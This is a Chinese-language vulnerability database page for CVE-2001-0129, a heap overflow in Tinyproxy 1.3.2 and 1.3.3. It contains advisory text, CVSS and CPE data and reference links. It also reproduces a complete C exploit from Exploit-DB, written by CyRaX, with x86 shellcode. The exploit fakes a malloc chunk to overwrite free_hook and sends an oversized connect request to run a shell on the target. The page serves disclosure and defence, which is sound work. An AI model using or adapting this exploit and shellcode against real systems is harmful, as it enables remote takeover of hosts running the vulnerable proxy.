CVE-2001-0129
CVSS10.0
发布时间 :2001-03-12 00:00:00
修订时间 :2016-10-17 22:09:47
NMCOE    

[原文]Buffer overflow in Tinyproxy HTTP proxy 1.3.3 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long connect request.


[CNNVD]Tinyproxy HTTP代理缓冲区溢出漏洞(CNNVD-200103-036)

        Tinyproxy HTTP proxy 1.3.3以及之前版本存在缓冲区溢出漏洞。远程攻击者借助超长连接请求导致服务拒绝并且可能执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:tinyproxy:tinyproxy:1.3.3
cpe:/a:tinyproxy:tinyproxy:1.3.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0129
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0129
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-036
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=97975486527750&w=2
(UNKNOWN)  BUGTRAQ  20010117 [pkc] remote heap overflow in tinyproxy
http://www.debian.org/security/2001/dsa-018
(PATCH)  DEBIAN  DSA-018
http://www.securityfocus.com/bid/2217
(VENDOR_ADVISORY)  BID  2217
http://xforce.iss.net/static/5954.php
(UNKNOWN)  XF  tinyproxy-remote-bo(5954)

- 漏洞信息

Tinyproxy HTTP代理缓冲区溢出漏洞
危急 缓冲区溢出
2001-03-12 00:00:00 2005-05-02 00:00:00
远程  
        Tinyproxy HTTP proxy 1.3.3以及之前版本存在缓冲区溢出漏洞。远程攻击者借助超长连接请求导致服务拒绝并且可能执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20559)

tinyproxy tinyproxy 1.3.2/1.3.3 Heap Overflow Vulnerability (EDBID:20559)
windows remote
2001-01-17 Verified
0 CyRaX
N/A [点击下载]
source: http://www.securityfocus.com/bid/2217/info

Versions 1.3.2 and 1.3.3 of tinyproxy, a small HTTP proxy, exhibit a vulnerability to heap overflow attacks.

A failure to properly validate user-supplied input which arguments a call to sprintf() can allow unexpectedly large amounts of input to a buffer (used to display error messages) to be written past the boundary of the allocated space on the heap.

As a result, it may be possible to execute a denial of service attack, or even to execute arbitrary commands if certain internal memory structures can be successfully overwritten. 

/*
 * Exploit for tinyproxy 1.3.2 and 1.3.3
 * by |CyRaX| <cyrax@pkcrew.org>
 * Packet Knights Crew - www.pkcrew.org
 * READ THE ADVISORY FIRST !
 * Greetz :
 *  bikappa: for some help
 *  all the pkc members expecially recidjvo, asynchro and cthulhu
 *  all the other friends
*/


#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>

char jmps[]="\xeb\x0e";

char c0de[]="\xeb\x0e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90"
            "\x89\xe5"
            "\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
            "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
            "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
            "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
            "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
            "\x80\xea\x27\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x1f\x5e"
            "\x80\x46\x04\x01"
            "\x80\x06\x01"
            "\x89\x75"
            "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
            "\x8d\x55\x0c\xcd\x80\xe8\xdc\xff\xff\xff\x2e\x62\x69\x6e\x2e\x73\x68";

void usage();

void usage(){
   printf("Exploit for Tinyproxy 1.3.2 and 1.3.3 by |CyRaX| <cyrax@pkcrew.org>\n");
   printf("Packet Knights Crew - http://www.pkcrew.org\n");
   printf("please.. READ the advisory first!\n");
   printf("Usage : ./PKCtiny-ex <host> <port> <buf_size> <struct offset> <free_hook> <shellcode>\n");
   printf("buf_size is the size of the buf we send\n");
   printf("struct offset is the distance from the beginning of the buffer we send where we\n");
   printf("       we put the malloc chunk struct!\n");
   printf("free_hook is the address of the free_hook function pointer\n");
   printf("shellcode is the address of the shellcode (you don't neet to hit it correctly\n");
   printf("          you can just hope to it a jump\n");
   printf("\nfree_hook and shellcode must be given in 0xaddress format\n");
   exit(0);
}

int main(int argc, char **argv){
   int s,i,err,pid[5];
   struct sockaddr_in dst;
   struct malloc_chunk{
      unsigned int ps;
      unsigned int sz;
      struct malloc_chunk *fd;
      struct malloc_chunk *bk;
   }mc;
   char *magic,*sndbuff;
   unsigned long FREE_HOOKZ,SHELLCODE;
   if(argc<5)usage();
   magic=(char *)malloc(atoi(argv[3])+1);
   sndbuff=(char *)malloc(atoi(argv[3])+30);
   memset(magic,'\x90',atoi(argv[3]));

   SHELLCODE=strtol(argv[6],NULL,16);
   FREE_HOOKZ=strtol(argv[5],NULL,16);


   dst.sin_addr.s_addr=inet_addr(argv[1]);
   dst.sin_port=htons(atoi(argv[2]));
   dst.sin_family=AF_INET;
   mc.ps=0xffffffff & ~1;
   mc.sz=0xffffffff;
   mc.fd=(struct malloc_chunk *)(SHELLCODE);
   mc.bk=(struct malloc_chunk *)(FREE_HOOKZ-8);

   s=socket(AF_INET,SOCK_STREAM,0);
   connect(s,(struct sockaddr *)&dst,sizeof(dst));
   memcpy(magic+atoi(argv[4]),&mc,sizeof(mc));

   if((atoi(argv[3])/2)<atoi(argv[4])){
      /* putting jmps and shellcode before the struct */
      for(i=0;i<(atoi(argv[4])-strlen(c0de)-10);i+=2){
	 memcpy(magic+i,jmps,2);
      }
   }
   else {
      /* putting jmps and shellcode after the struct */
      for(i=atoi(argv[4])+sizeof(mc);i<atoi(argv[3])-10-strlen(c0de);i+=2){
	 memcpy(magic+i,jmps,2);
      }
   }
   memcpy(magic+i,c0de,strlen(c0de));

   magic[atoi(argv[3])]=0;

   printf("strlen magic is %i\n",strlen(magic));
   sndbuff[snprintf(sndbuff,atoi(argv[3])+20,"connect %s://\n",magic)]=0;
   printf("shooting\n");
   err=send(s,sndbuff,strlen(sndbuff),0);
}

		

- 漏洞信息

493
tinyProxy Connect Request Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

This host is running the 'tinyProxy' server. This proxy server is vulnerable to a heap overflow attack. By issuing a malformed request and attacker can cause a denial of service attack or possibly execute code on this host. An attacker can use this to disable the proxy server and deny legitimate users access.

- 时间线

2001-01-17 Unknow
2001-01-17 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站